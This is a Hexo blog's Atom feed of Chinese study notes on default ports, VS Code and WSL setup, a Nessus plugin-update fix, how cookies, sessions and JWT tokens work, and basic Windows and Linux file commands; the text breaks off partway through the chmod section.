-
Notifications
You must be signed in to change notification settings - Fork 0
/
atom.xml
527 lines (296 loc) · 366 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Hexo</title>
<link href="/atom.xml" rel="self"/>
<link href="https://singlemindedt.github.io/"/>
<updated>2020-10-30T07:32:44.759Z</updated>
<id>https://singlemindedt.github.io/</id>
<author>
<name>Smtsec</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>HTTP、HTTPS等默认端口</title>
<link href="https://singlemindedt.github.io/2020/10/30/HTTPHTTPS%E7%AD%89%E9%BB%98%E8%AE%A4%E7%AB%AF%E5%8F%A3/"/>
<id>https://singlemindedt.github.io/2020/10/30/HTTPHTTPS等默认端口/</id>
<published>2020-10-30T07:17:02.000Z</published>
<updated>2020-10-30T07:32:44.759Z</updated>
<content type="html"><![CDATA[<blockquote><p><a href="https://blog.csdn.net/qiucheng_198806/article/details/87375505" target="_blank" rel="noopener">HTTP、HTTPS等常用的默认端口号</a></p></blockquote>]]></content>
<summary type="html">
<blockquote>
<p><a href="https://blog.csdn.net/qiucheng_198806/article/details/87375505" target="_blank" rel="noopener">HTTP、HTTPS等常用的默认端口号<
</summary>
</entry>
<entry>
<title>VScode配置运行环境</title>
<link href="https://singlemindedt.github.io/2020/10/29/vscode%E9%85%8D%E7%BD%AE%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/"/>
<id>https://singlemindedt.github.io/2020/10/29/vscode配置运行环境/</id>
<published>2020-10-28T16:00:00.000Z</published>
<updated>2020-10-29T08:21:15.821Z</updated>
<content type="html"><![CDATA[<h2 id="1-MinGW下载和安装教程"><a href="#1-MinGW下载和安装教程" class="headerlink" title="1.MinGW下载和安装教程"></a><a href="http://c.biancheng.net/view/8077.html" target="_blank" rel="noopener">1.MinGW下载和安装教程</a></h2><h2 id="2-VS-Code运行C和C-程序"><a href="#2-VS-Code运行C和C-程序" class="headerlink" title="2.VS Code运行C和C++程序"></a><a href="http://c.biancheng.net/view/8114.html" target="_blank" rel="noopener">2.VS Code运行C和C++程序</a></h2><h2 id="3-重启VScode"><a href="#3-重启VScode" class="headerlink" title="3.重启VScode"></a>3.重启VScode</h2>]]></content>
<summary type="html">
<h2 id="1-MinGW下载和安装教程"><a href="#1-MinGW下载和安装教程" class="headerlink" title="1.MinGW下载和安装教程"></a><a href="http://c.biancheng.net/view/8077.ht
</summary>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>WSL</title>
<link href="https://singlemindedt.github.io/2020/09/17/WSL/"/>
<id>https://singlemindedt.github.io/2020/09/17/WSL/</id>
<published>2020-09-17T14:31:16.000Z</published>
<updated>2020-09-20T07:57:12.065Z</updated>
<content type="html"><![CDATA[<p>[TOC]</p><h2 id="1-WSL存在目录:"><a href="#1-WSL存在目录:" class="headerlink" title="1.WSL存在目录:"></a>1.WSL存在目录:</h2><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">C:\Users\xxx\AppData\Local\Packages\KaliLinux\LocalState\rootfs</span><br></pre></td></tr></table></figure><p><a href="https://blog.csdn.net/luansj/article/details/97272672" target="_blank" rel="noopener">https://blog.csdn.net/luansj/article/details/97272672</a></p><hr><h2 id="2-无法执行一些系统命令:"><a href="#2-无法执行一些系统命令:" class="headerlink" title="2.无法执行一些系统命令:"></a>2.无法执行一些系统命令:</h2><p>如<code>shutdown -h now 关闭系统</code></p><blockquote><p>🐖:</p><p>系统尚未以systemd作为init System(PID 1)启动。无法操作。</p><p>无法连接到总线:主机已关闭</p></blockquote><h2 id="3-个人主目录"><a href="#3-个人主目录" class="headerlink" title="3.个人主目录"></a>3.个人主目录</h2><p>位于home目录下的个人用户下;</p>]]></content>
<summary type="html">
<p>[TOC]</p>
<h2 id="1-WSL存在目录:"><a href="#1-WSL存在目录:" class="headerlink" title="1.WSL存在目录:"></a>1.WSL存在目录:</h2><figure class="highlight sh"
</summary>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>Nessus</title>
<link href="https://singlemindedt.github.io/2020/09/17/Nessus/"/>
<id>https://singlemindedt.github.io/2020/09/17/Nessus/</id>
<published>2020-09-17T04:11:38.000Z</published>
<updated>2020-09-17T04:23:40.934Z</updated>
<content type="html"><![CDATA[<p>Nessus安装遇到的问题,做一记录:</p><p><font color="#ff0000">插件安装失败</font></p><p>进入安装目录,执行<code>nessuscli update</code>(网络保证良好)</p><p>访问:<code>https://localhost:8834/#/</code>即可;</p><p><em>网上其他方法均为成功:slightly_smiling_face:</em></p><hr><blockquote><p> 可参考:</p><p><a href="https://blog.csdn.net/qq_44342688/article/details/104511557" target="_blank" rel="noopener">win10系统Nessus下载插件错误</a></p></blockquote>]]></content>
<summary type="html">
<p>Nessus安装遇到的问题,做一记录:</p>
<p><font color="#ff0000">插件安装失败</font></p>
<p>进入安装目录,执行<code>nessuscli update</code>(网络保证良好)</p>
<p>访问:<code>http
</summary>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>cookie、session、token</title>
<link href="https://singlemindedt.github.io/2020/09/11/cookie/"/>
<id>https://singlemindedt.github.io/2020/09/11/cookie/</id>
<published>2020-09-11T08:59:48.000Z</published>
<updated>2020-09-14T06:45:48.381Z</updated>
<content type="html"><![CDATA[<p>🐖:</p><p>HTTP为<font color="#ff0000">无状态协议</font>,即本次请求和上一次的请求不存在关联性;</p><blockquote><p>比如:我在<a href="http://www.a.com/login.php里面登陆了,我在www.a.com/index.php" target="_blank" rel="noopener">www.a.com/login.php里面登陆了,我在www.a.com/index.php</a> 也希望是登陆状态,但是,这是2个不同的页面,也就是2个不同的HTTP请求,这2个HTTP请求是无状态的,也就是无关联的,所以无法单纯的在index.php中读取到它在login.php中已经登陆了!—3</p></blockquote><h3 id="1-session"><a href="#1-session" class="headerlink" title="1.session"></a>1.session</h3><h4 id="理解:"><a href="#理解:" class="headerlink" title="理解:"></a>理解:</h4><p>存储会话控制机制,连接标志;</p><p>类似于一个状态列表,存储于服务器中;</p><p>目的:为无状态的HTTP提供的持久机制;</p><p>服务器一般使用cookie来实现session,cookie包含session的标识符;</p><h4 id="过程:"><a href="#过程:" class="headerlink" title="过程:"></a>过程:</h4><ul><li>客户端发送请求</li><li>服务器检测是否有session(没有则创建一个session,有则利用该session),服务器临时保存session,用户离开网站后销毁</li></ul><p>+++</p><blockquote><h4 id="关键区别"><a href="#关键区别" class="headerlink" title="关键区别"></a>关键区别</h4><ul><li>Cookies是包含用户信息的客户端文件,而Sessions是包含用户信息的服务器端文件。</li><li>Cookie不依赖于Session,但是Session依赖于Cookie。</li><li>Cookie的过期时间取决于您为其设置的生存时间,而Session在用户关闭其浏览器时结束。</li><li>Cookie的最大大小为4KB,而在Session中,您可以存储任意数量的数据。可以达到的唯一限制是脚本一次可以消耗的最大内存,默认情况下为128MB</li><li>Cookie没有名为unsetcookie()的函数,而在Session中您可以使用Session_destroy(); 用于销毁所有注册数据或取消设置某些数据</li><li>无需启动cookie,因为它存储在本地计算机中,而在session中, 在PHP中使用$ _SESSION之前,必须编写session_start();。其他语言也一样</li></ul></blockquote><p>+++</p><h3 id="2-cookie"><a href="#2-cookie" class="headerlink" title="2. cookie"></a>2. cookie</h3><p><font color="#ff0000">基于会话的身份验证</font></p><h4 id="理解:-1"><a href="#理解:-1" class="headerlink" title="理解:"></a>理解:</h4><ul><li>目的:同服务器保持活动状态</li><li>形式:以文本文件形式储存在浏览器目录中</li><li>cookie具有时效性<ul><li>cookie管理—-<ul><li>持久化(存储在本地磁盘)</li><li>非持久化(存储在内存)</li></ul></li></ul></li><li><strong>会话存储在服务器内存中,当大量用户同时使用时,会给服务器造成一定压力;</strong></li><li>Cookie的身份验证是<font color="#ff0000">有状态</font>的—><strong>服务器和客户端同时保留身份验证记录或会话</strong>;</li></ul><h4 id="过程:-1"><a href="#过程:-1" class="headerlink" title="过程:"></a>过程:</h4><ul><li>客户端发送请求<ul><li>用户登录username/password</li></ul></li><li>服务端接收请求,返回含Set-cookie头部的响应包<ul><li>服务器验证凭据正确无误,为该用户创建会话,将其存储在数据库中</li><li><strong>将会话ID存储在用户浏览器的cookie中</strong>(数据大小受浏览器限制通常<4KB)</li></ul></li><li>客户端再次发送请求(包含cookie,以便服务器用来唯一标识客户端身份信息),服务端接收并验证用户身份<ul><li>用户保持登录状态时,cookie将与后续每个请求一起发送</li><li><strong>服务器将cookie上存储的会话ID与内存(数据库)中存储的会话信息进行比较,以验证用户的身份并发送响应状态的响应</strong></li></ul></li><li>客户端注销登录状态,该会话将从客户端和服务器数据库中删除;</li></ul><p><img src="https://s1.ax1x.com/2020/09/14/wDmSOI.png" alt="wDmSOI.png"></p><p>+++</p><h3 id="3-token"><a href="#3-token" class="headerlink" title="3. token"></a>3. token</h3><p><font color="#ff0000">JWT(JSON Web Token)基于令牌的身份验证</font></p><h4 id="理解:-2"><a href="#理解:-2" class="headerlink" title="理解:"></a>理解:</h4><p>基于token的身份验证是<font color="#ff0000">无状态</font>的–>服务器不保留会话信息;</p><p>访问令牌</p><p>构成:uid(用户唯一的身份标识)、time(当前时间的时间戳)、sign(签名,由token的前几位+盐以哈希算法压缩成一定长的十六进制字符串,可以防止恶意第三方拼接token请求服务器)。</p><h4 id="过程:-2"><a href="#过程:-2" class="headerlink" title="过程:"></a>过程:</h4><ul><li>用户发送请求<ul><li>用户登录username/password</li></ul></li><li>服务器接收请求,验证凭据正确无误,并创建一个已签名的token,携带该token信息响应客户端</li><li>客户端收到响应,将token本地存储或存储于会话存储或cookie中,并在后续的每个请求中携带该token</li><li>服务器接收请求,检测并解码token签名,从token中获取用户信息,最后响应客户端(将此token作为附加的Authorization标头或通过上述其他方法之一包含在内)<ul><li>服务器解码token<ul><li>token有效:处理请求并发送响应</li><li>用户注销:客户端销毁token(无需与服务器进行交互)</li></ul></li></ul></li></ul><p><img src="https://s1.ax1x.com/2020/09/14/wDeIyR.png" alt="wDeIyR.png"></p><h4 id="优点:"><a href="#优点:" class="headerlink" title="优点:"></a>优点:</h4><p>使用token验证是无状态的,后端无需保存token记录;</p><p>每个token都是独立的,包含有效性和用户信息的所有数据;</p><p>服务器只需在成功的登录请求上对token进行签名,并验证token的有效性;</p><hr><blockquote><p>参考:</p><ol><li><a href="https://www.cnblogs.com/moyand/p/9047978.html" target="_blank" rel="noopener">彻底理解cookie、session、token</a></li><li><a href="https://segmentfault.com/a/1190000017831088" target="_blank" rel="noopener">彻底弄懂session,cookie,token</a></li><li><a href="https://www.jianshu.com/p/bd1be47a16c1" target="_blank" rel="noopener">Cookie、Session、Token那点事儿(原创)</a></li><li><a href="https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4" target="_blank" rel="noopener">Session vs Token Based Authentication</a></li><li><a href="https://medium.com/better-programming/json-web-tokens-vs-session-cookies-for-authentication-55a5ddafb435" target="_blank" rel="noopener">JSON Web Tokens vs. Session Cookies for Authentication</a></li><li><a href="https://dzone.com/articles/cookies-vs-tokens-the-definitive-guide" target="_blank" rel="noopener">Cookies vs. Tokens: The Definitive Guide</a></li><li><a href="https://www.guru99.com/difference-between-cookie-session.html" target="_blank" rel="noopener">Difference between Cookie and Session</a></li></ol></blockquote>]]></content>
<summary type="html">
<p>🐖:</p>
<p>HTTP为<font color="#ff0000">无状态协议</font>,即本次请求和上一次的请求不存在关联性;</p>
<blockquote>
<p>比如:我在<a href="http://www.a.com/login.php里面登陆了,
</summary>
<category term="note" scheme="https://singlemindedt.github.io/tags/note/"/>
</entry>
<entry>
<title>命令行下常用文件操作命令</title>
<link href="https://singlemindedt.github.io/2020/09/10/CD/"/>
<id>https://singlemindedt.github.io/2020/09/10/CD/</id>
<published>2020-09-10T05:27:08.000Z</published>
<updated>2020-09-20T07:56:26.002Z</updated>
<content type="html"><![CDATA[<p>[TOC]</p><h2 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h2><h3 id="1、进入盘符"><a href="#1、进入盘符" class="headerlink" title="1、进入盘符"></a>1、进入盘符</h3><figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">直接输入对应目标盘字母加:</span><br><span class="line"><span class="symbol">eg:</span>进入F盘</span><br><span class="line"><span class="symbol">f:</span></span><br><span class="line"><span class="symbol">F:</span></span><br></pre></td></tr></table></figure><h3 id="2、进入指定目录"><a href="#2、进入指定目录" class="headerlink" title="2、进入指定目录"></a>2、进入指定目录</h3><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">cd</span> 目录名(一级目录)</span><br><span class="line"><span class="keyword">cd</span> 目录路径</span><br><span class="line"></span><br><span class="line">如打开某一级目录文件则无需<span class="keyword">cd</span>,<span class="keyword">e</span><span class="variable">g:</span></span><br><span class="line">XXX.txt</span><br></pre></td></tr></table></figure><p>+++</p><h3 id="3、利用-d参数直接进入某盘下某目录"><a href="#3、利用-d参数直接进入某盘下某目录" class="headerlink" title="3、利用/d参数直接进入某盘下某目录"></a>3、利用/d参数直接进入某盘下某目录</h3><figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">eg:</span>进入F盘下tools目录</span><br><span class="line">cd /d <span class="string">f:</span>\tools</span><br></pre></td></tr></table></figure><p>+++</p><h3 id="4、返回上级目录"><a href="#4、返回上级目录" class="headerlink" title="4、返回上级目录"></a>4、返回上级目录</h3><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">cd</span></span> ..</span><br></pre></td></tr></table></figure><h3 id="5、返回当前盘根目录"><a href="#5、返回当前盘根目录" class="headerlink" title="5、返回当前盘根目录"></a>5、返回当前盘根目录</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /</span><br><span class="line"><span class="built_in">cd</span> \</span><br></pre></td></tr></table></figure><h3 id="6、dir命令查看该目录下文件及子目录列表详细信息"><a href="#6、dir命令查看该目录下文件及子目录列表详细信息" class="headerlink" title="6、dir命令查看该目录下文件及子目录列表详细信息"></a>6、dir命令查看该目录下文件及子目录列表详细信息</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">dir</span></span><br><span class="line"><span class="built_in">dir</span> /a *</span><br></pre></td></tr></table></figure><h3 id="7、ls列出当前目录下所有一级目录"><a href="#7、ls列出当前目录下所有一级目录" class="headerlink" title="7、ls列出当前目录下所有一级目录"></a>7、ls列出当前目录下所有一级目录</h3><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">ls</span></span><br></pre></td></tr></table></figure><h3 id="8、通过在命令后加-查看命令用法"><a href="#8、通过在命令后加-查看命令用法" class="headerlink" title="8、通过在命令后加/?查看命令用法"></a>8、通过在命令后加<code>/?</code>查看命令用法</h3><figure class="highlight dos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">dir</span>/?</span><br></pre></td></tr></table></figure><hr><h2 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h2><h3 id="1、-关机重启注销"><a href="#1、-关机重启注销" class="headerlink" title="1、 关机重启注销"></a>1、 关机重启注销</h3><figure class="highlight properties"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">shutdown</span> <span class="string">-h now 关闭系统</span></span><br><span class="line"><span class="attr">init</span> <span class="string">0 关闭系统</span></span><br><span class="line"><span class="attr">telinit</span> <span class="string">0 关闭系统</span></span><br><span class="line"><span class="attr">shutdown</span> <span class="string">-h hours:minutes & 按预定时间关闭系统 </span></span><br><span class="line"><span class="attr">shutdown</span> <span class="string">-c 取消按预定时间关闭系统 </span></span><br><span class="line"><span class="attr">shutdown</span> <span class="string">-r now 重启</span></span><br><span class="line"><span class="attr">reboot</span> <span class="string">重启</span></span><br><span class="line"><span class="attr">logout</span> <span class="string">注销</span></span><br></pre></td></tr></table></figure><h3 id="2-文件操作"><a href="#2-文件操作" class="headerlink" title="2. 文件操作"></a>2. 文件操作</h3><h4 id="cd"><a href="#cd" class="headerlink" title="cd"></a>cd</h4><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">cd</span> / 进入根目录</span><br><span class="line"><span class="keyword">cd</span> 进入个人主目录</span><br><span class="line"><span class="keyword">cd</span> <span class="string">..</span> 返回上一级目录</span><br><span class="line"><span class="keyword">cd</span> <span class="string">../..</span> 返回上两级目录</span><br><span class="line"><span class="keyword">cd</span> 用户名 进入个人主目录</span><br><span class="line"><span class="keyword">cd</span> - 返回上次所在目录</span><br><span class="line"><span class="keyword">cd</span> <span class="string">./path</span> 切换到当前目录下的path目录中,“.”表示当前目录 </span><br><span class="line"><span class="keyword">cd</span> <span class="string">../path</span>切换到上层目录中的path目录中,“<span class="string">..</span>”表示上一层目录</span><br><span class="line"><span class="keyword">cd</span> <span class="string">/home/will</span> 切换到目录<span class="string">/home/will</span>下</span><br></pre></td></tr></table></figure><h4 id="ls"><a href="#ls" class="headerlink" title="ls"></a>ls</h4><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">ls 查看目录中的文件</span><br><span class="line"><span class="deletion">-a :全部的档案,连同隐藏档( 开头为 . 的档案) 一起列出来~ </span></span><br><span class="line"><span class="deletion">-A :全部的档案,连同隐藏档,但不包括 . 与 .. 这两个目录,一起列出来~ </span></span><br><span class="line"><span class="deletion">-d :仅列出目录本身,而不是列出目录内的档案数据 </span></span><br><span class="line"><span class="deletion">-f :直接列出结果,而不进行排序 (ls 预设会以档名排序!) </span></span><br><span class="line"><span class="deletion">-F :根据档案、目录等信息,给予附加数据结构,例如: </span></span><br><span class="line">*:代表可执行档; /:代表目录; =:代表 socket 档案; |:代表 FIFO 档案; </span><br><span class="line"><span class="deletion">-h :将档案容量以人类较易读的方式(例如 GB, KB 等等)列出来; </span></span><br><span class="line"><span class="deletion">-i :列出 inode 位置,而非列出档案属性; </span></span><br><span class="line"><span class="deletion">-l :长数据串行出,包含档案的属性等等数据; </span></span><br><span class="line"><span class="deletion">-n :列出 UID 与 GID 而非使用者与群组的名称 (UID与GID会在账号管理提到!) </span></span><br><span class="line"><span class="deletion">-r :将排序结果反向输出,例如:原本档名由小到大,反向则为由大到小; </span></span><br><span class="line"><span class="deletion">-R :连同子目录内容一起列出来; </span></span><br><span class="line"><span class="deletion">-S :以档案容量大小排序! </span></span><br><span class="line"><span class="deletion">-t :依时间排序 </span></span><br><span class="line"><span class="deletion">--color=never :不要依据档案特性给予颜色显示; </span></span><br><span class="line"><span class="deletion">--color=always :显示颜色 </span></span><br><span class="line"><span class="deletion">--color=auto :让系统自行依据设定来判断是否给予颜色 </span></span><br><span class="line"><span class="deletion">--full-time :以完整时间模式 (包含年、月、日、时、分) 输出 </span></span><br><span class="line"><span class="deletion">--time={atime,ctime} :输出 access 时间或 改变权限属性时间 (ctime) </span></span><br><span class="line">而非内容变更时间 (modification time) </span><br><span class="line"> </span><br><span class="line">例如:</span><br><span class="line">ls [-aAdfFhilRS] 目录名称 </span><br><span class="line">ls [--color={none,auto,always}] 目录名称 </span><br><span class="line">ls [--full-time] 目录名称</span><br></pre></td></tr></table></figure><h4 id="pwd"><a href="#pwd" class="headerlink" title="pwd"></a>pwd</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">pwd</span> 显示工作路径</span><br></pre></td></tr></table></figure><h4 id="find"><a href="#find" class="headerlink" title="find"></a>find</h4><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">find</span> 目录名 查找相应目录</span><br><span class="line"></span><br><span class="line">-name 指定字符串作为寻找文件或目录的范本样式</span><br><span class="line">例如:<span class="built_in">find</span> /<span class="built_in">home</span>/ -name <span class="string">'a*'</span> 查找<span class="built_in">home</span>下的文件开头是a的文件和文件夹,*是通配符 。注意字符串要用单引号引起来。</span><br></pre></td></tr></table></figure><h4 id="touch"><a href="#touch" class="headerlink" title="touch"></a>touch</h4><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">touch</span> <span class="number">1.</span>txt 在当前目录创建<span class="number">1.</span>txt</span><br></pre></td></tr></table></figure><h4 id="mkdir"><a href="#mkdir" class="headerlink" title="mkdir"></a>mkdir</h4><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mkdir<span class="built_in"> aaa</span>在当前目录下创建目录aaa,需要管理员权限</span><br><span class="line">mkdir /home<span class="built_in">/aaa </span>在home目录下创建目录aaa</span><br><span class="line">mkdir -pv /home/a/b/c在home目录下创建多级目录</span><br><span class="line">-p:父目录不存在情况下先生成父目录</span><br><span class="line">-v:显示命令执行过程中的详细信息</span><br></pre></td></tr></table></figure><p>🐖:按Tab键补齐文件名</p><h4 id="vi-vim"><a href="#vi-vim" class="headerlink" title="vi/vim"></a>vi/vim</h4><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vi 文件名 一般模式</span><br><span class="line">-<span class="selector-tag">i</span> 插入模式</span><br><span class="line">Esc 退出到一般模式</span><br><span class="line">:wq 在一般模式下,保存并退出</span><br></pre></td></tr></table></figure><h4 id="rm"><a href="#rm" class="headerlink" title="rm"></a>rm</h4><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">rm 删除文件或目录</span><br><span class="line">语法:rm [<span class="string">-dfirv</span>][<span class="symbol">--help</span>][<span class="string">--version</span>][<span class="symbol">文件或目录...</span>]</span><br><span class="line">-f 或 --force 强制删除文件或目录</span><br><span class="line">-r 或 -R 或 --recursive 递归处理,将指定目录下的所有文件及子目录一并处理</span><br><span class="line">强制删除文件:rm -f ./1.txt </span><br><span class="line">强制删除目录:rm -rf ./a</span><br></pre></td></tr></table></figure><h4 id="管道"><a href="#管道" class="headerlink" title="管道"></a>管道</h4><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">管道</span><br><span class="line">命令<span class="number">1</span>|命令<span class="number">2</span> 将命令<span class="number">1</span>的输出内容作为命令<span class="number">2</span>的输入内容执行</span><br></pre></td></tr></table></figure><h4 id="ps"><a href="#ps" class="headerlink" title="ps"></a>ps</h4><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">ps</span> -ef 查看当前所有进程(包括执行<span class="keyword">ps</span>命令的那个时刻进程信息)</span><br><span class="line">格式:<span class="keyword">ps</span> [参数]</span><br><span class="line">-<span class="keyword">e</span> 此参数的效果和指定“A”参数相同,显示所有程序</span><br><span class="line">-<span class="keyword">f</span> 显示UID,PPIP,C与STIME栏位</span><br><span class="line">例如:<span class="keyword">ps</span> -ef | <span class="keyword">grep</span> -i mysql 过滤出mysql这个进程</span><br></pre></td></tr></table></figure><h4 id="kill"><a href="#kill" class="headerlink" title="kill"></a>kill</h4><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">kill删除执行中的程序或工作</span><br><span class="line">语法:kill[<span class="string">参数</span>][<span class="symbol">程序</span>]</span><br><span class="line">-l<span class="xml"><span class="tag"><<span class="name">信息编号</span>></span></span> 若不加<span class="xml"><span class="tag"><<span class="name">信息编号</span>></span></span>选项,则-l参数会列出全部的信息名称。</span><br><span class="line">kill -9 :表示强制终止</span><br><span class="line">格式:kill -9 pid</span><br><span class="line">可先通过ps -ef 查找出所要删除的进程pid,再通过kill -9 pid 终止进程</span><br></pre></td></tr></table></figure><h4 id="chmod"><a href="#chmod" class="headerlink" title="chmod"></a>chmod</h4><figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">chmod 变更文件或目录的权限</span><br><span class="line"></span><br><span class="line">语法:chmod [<span class="string">参数</span>][<span class="symbol"><权限范围><符号><权限代号></span>]</span><br><span class="line">-R 或 --recursive 递归处理,将指定目录下的所有文件及子目录一并处理</span><br><span class="line">--权限范围的表示法如下:</span><br><span class="line">u:User 即文件或目录的拥有者</span><br><span class="line">g:Group 即文件或目录的所属群组</span><br><span class="line">o:Other 除了文件或目录拥有者或所属群组之外,其他用户皆属于这个范围</span><br><span class="line">a:All 即全部的用户,包含拥有者,所属群组及其他用户。</span><br><span class="line">--符号</span><br><span class="line"><span class="bullet">+ </span>添加权限</span><br><span class="line"><span class="bullet">- </span>取消权限</span><br><span class="line">-- 有关权限代号的部分</span><br><span class="line">r:读取权限,数字代号为“4”</span><br><span class="line">w:写入权限,数字代号为“2”</span><br><span class="line">x:执行或切换权限,数字代号为“1”</span><br><span class="line"><span class="bullet">- 